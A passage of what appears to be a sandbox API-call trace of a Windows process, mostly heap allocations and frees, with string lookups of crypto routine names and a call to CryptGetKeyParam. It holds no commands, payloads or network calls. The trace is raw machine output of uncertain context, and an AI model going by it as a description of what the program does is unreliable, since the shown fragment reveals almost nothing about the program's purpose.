hHeap=0x1780000) returned 1 [0086.051] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0086.051] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0086.051] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0086.051] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0086.051] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0086.055] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ef00 | out: lpNewFilePointer=0x0) returned 1 [0086.055] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ef28*=0x11a, lpOverlapped=0x0) returned 1 [0086.055] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ef28*=0x0, lpOverlapped=0x0) returned 1 [0086.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fb0 | out: hHeap=0x1780000) returned 1 [0086.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0086.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0086.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e0f020 | out: hHeap=0x1780000) returned 1 [0086.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca058 | out: hHeap=0x1780000) returned 1 [0086.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0d0 | out: hHeap=0x1780000) returned 1 [0086.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0086.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0086.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cc1c8 | out: hHeap=0x1780000) returned 1 [0086.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0086.059] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0086.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0086.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ccfa8 | out: hHeap=0x1780000) returned 1 [0086.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0086.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0d0 | out: hHeap=0x1780000) returned 1 [0086.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0086.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0086.059] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0086.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0086.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2360 | out: hHeap=0x1780000) returned 1 [0086.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0086.059] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0086.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ce8 | out: hHeap=0x1780000) returned 1 [0086.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0086.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0086.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0086.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0086.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0086.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca040 | out: hHeap=0x1780000) returned 1 [0086.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0086.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0086.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ff8 | out: hHeap=0x1780000) returned 1 [0086.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca058 | out: hHeap=0x1780000) returned 1 [0086.060] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0086.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0086.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0086.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0086.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f38 | out: hHeap=0x1780000) returned 1 [0086.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 [0086.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0086.060] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0086.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ea8 | out: hHeap=0x1780000) returned 1 [0086.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0086.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 [0086.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0086.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0086.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0086.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0086.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0086.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca148 | out: hHeap=0x1780000) returned 1 [0086.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fe0 | out: hHeap=0x1780000) returned 1 [0086.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0086.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0086.061] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0086.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0086.061] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0086.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a80 | out: hHeap=0x1780000) returned 1 [0086.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0086.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0086.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0086.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d08 | out: hHeap=0x1780000) returned 1 [0086.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0086.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0086.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0086.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0086.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0086.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0086.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0086.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0086.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0086.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0086.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0086.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0086.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0086.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0086.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0086.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2728 | out: hHeap=0x1780000) returned 1 [0086.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0086.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0086.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0086.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0086.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0086.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0086.062] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0086.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0086.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0086.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0086.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0086.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0086.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0086.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0086.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0086.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0086.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0086.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0086.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0086.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0086.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0086.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0086.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0086.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0086.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0086.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0086.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0086.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0086.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0086.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0086.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0086.063] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0086.063] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796ee8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0086.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0086.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0086.063] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0086.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0086.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0086.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0086.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0086.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0086.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0086.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0086.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0086.064] CryptGetKeyParam (in: hKey=0x41ac700, dwParam=0x7, pbData=0x43e25d0, pdwDataLen=0x144e260, dwFlags=0x0 | out: pbData=0x43e25d0*=0x6610, pdwDataLen=0x144e260*=0x4) returned 1 [0086.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0086.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e95f0 [0086.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0086.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0086.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0086.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0086.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0086.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0086.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0086.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0086.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0086.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0086.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0086.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0086.065] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0086.065] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0086.065] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0086.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0086.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0086.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0086.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0086.065] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0086.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0086.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0086.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0086.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0086.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0086.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0086.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0086.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0086.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0086.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ea8 [0086.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0086.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0086.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0086.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0086.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0086.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0086.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0086.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0086.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0086.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0086.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0086.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0086.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0086.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0086.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0086.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0086.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0086.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0086.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0086.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0086.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0086.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0086.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0086.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0086.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0086.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0086.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ea8 | out: hHeap=0x1780000) returned 1 [0086.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fe0 | out: hHeap=0x1780000) returned 1 [0086.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0086.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f38 | out: hHeap=0x1780000) returned 1 [0086.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0086.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 [0086.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0086.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0086.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0086.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0086.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0086.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0086.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0086.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0086.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2bd8 | out: hHeap=0x1780000) returned 1 [0086.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0086.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0086.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0086.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0086.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0086.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0086.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0086.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0086.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0086.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0086.068] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0086.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0086.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0086.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0086.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0086.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0086.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0086.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0086.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 